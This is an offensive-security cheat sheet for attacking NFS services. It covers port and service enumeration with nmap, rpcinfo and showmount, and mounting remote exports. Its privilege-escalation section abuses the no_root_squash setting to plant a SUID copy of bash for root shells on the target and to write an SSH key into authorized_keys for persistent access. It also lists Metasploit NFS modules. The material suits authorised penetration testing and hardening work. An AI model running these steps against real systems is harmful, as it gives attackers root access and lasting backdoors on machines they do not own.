==============================
NFS (Network File System)
Cheat Sheet – Professional
==============================

PORTS:
2049/TCP,UDP – NFS
111/TCP,UDP – RPCBind / Portmapper
Dynamic ports – mountd, nlockmgr, statd

Transport:
TCP / UDP

Purpose:
Remote file system sharing
(Client ↔ NFS Server)

--------------------------------
1. BASIC ENUMERATION
--------------------------------

nmap -p111,2049 -sV <IP>
nmap --script nfs-* -p111,2049 <IP>

rpcinfo -p <IP>

showmount -e <IP>
mkdir /mnt/nfs
mount -t nfs <IP>:/home /mnt/nfs
mount -o ro -t nfs <IP>:/home /mnt/nfs
cd /mnt/nfs
tree .

ls -la /mnt/nfs
id

If export has:
no_root_squash

sudo su
touch /mnt/nfs/pwned

**PRIVILEGE ESCALATION**
# Create SUID binary
cp /bin/bash /mnt/nfs/bash
chmod +s /mnt/nfs/bash

# On target system
./bash -p

# Add SSH key
mkdir /mnt/nfs/.ssh
echo "ssh-rsa AAAA..." >> /mnt/nfs/.ssh/authorized_keys
chmod 600 authorized_keys

/etc/exports
/etc/hosts.allow
/etc/hosts.deny

use auxiliary/scanner/nfs/nfsmount
use auxiliary/scanner/nfs/nfs_login

/var/log/syslog
/var/log/messages

